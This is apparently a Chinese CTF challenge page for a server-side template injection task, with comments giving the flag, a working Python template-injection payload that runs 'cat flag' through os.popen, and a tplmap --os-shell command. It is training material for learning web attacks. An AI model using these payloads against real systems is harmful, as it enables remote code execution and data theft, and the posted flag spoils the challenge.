Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 14818
提  示:
描  述:
Simple_SSTI_2
评论
saber2k 1年前

flag{8b37299e6a976863ae79c8c173ce7cd1}

回复 0

18096199839 1年前

http://114.67.175.224:12412/?flag={{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22cat%20flag%22).read()%27)}} 直接构造

回复 1

tigernolion 1年前

./tplmap.py -u http://114.67.175.224:14305/?flag=123 --os-shell

回复 0

Adaneo 1年前

有点像命令执行

回复 0

Timeover 1年前

全靠大佬

回复 1

342300 1年前

回复 1

zhangcoolcheng 2年前

还是不知道原理

回复 2
ttxs25830 2年前

后端代码中会把flag参数里的字符串用模板引擎渲染出来,这个方法就是让模板引擎以为我们的字符串其实是要执行的代码,大概是这个原理

回复 7

lmzq 2年前

用模板注入 直接用popen类调用os.open()执行系统命令

回复 0

奋斗中的小宸宸 2年前

https://blog.csdn.net/qq_51096893/article/details/122020518

回复 3
hehe呵呵 1年前

payload不行啊,链接直接被重置掉了

回复 0

haaaaa 2年前

背板

回复 1

WriteUp

image
valecalida

5 金币

评分(14)

解题动态

442012091 攻破了该题 4分钟前
Zer000 攻破了该题 17分钟前
2021303180 攻破了该题 1小时前
18743586026 攻破了该题 6小时前
linghe180 攻破了该题 6小时前
我说起风了 攻破了该题 17小时前
御天然 攻破了该题 18小时前
Nature_ 攻破了该题 19小时前
2358020128 攻破了该题 19小时前
chxj2024 攻破了该题 20小时前
麦辣鸡腿堡 攻破了该题 22小时前
wzy666 攻破了该题 23小时前
18853833706 攻破了该题 23小时前
seeyou51 攻破了该题 23小时前
Ningxby 攻破了该题 1天前
gankJin 攻破了该题 1天前
18047887929 攻破了该题 1天前
ArthurMorgan 攻破了该题 1天前
江户川 攻破了该题 1天前
congying 攻破了该题 1天前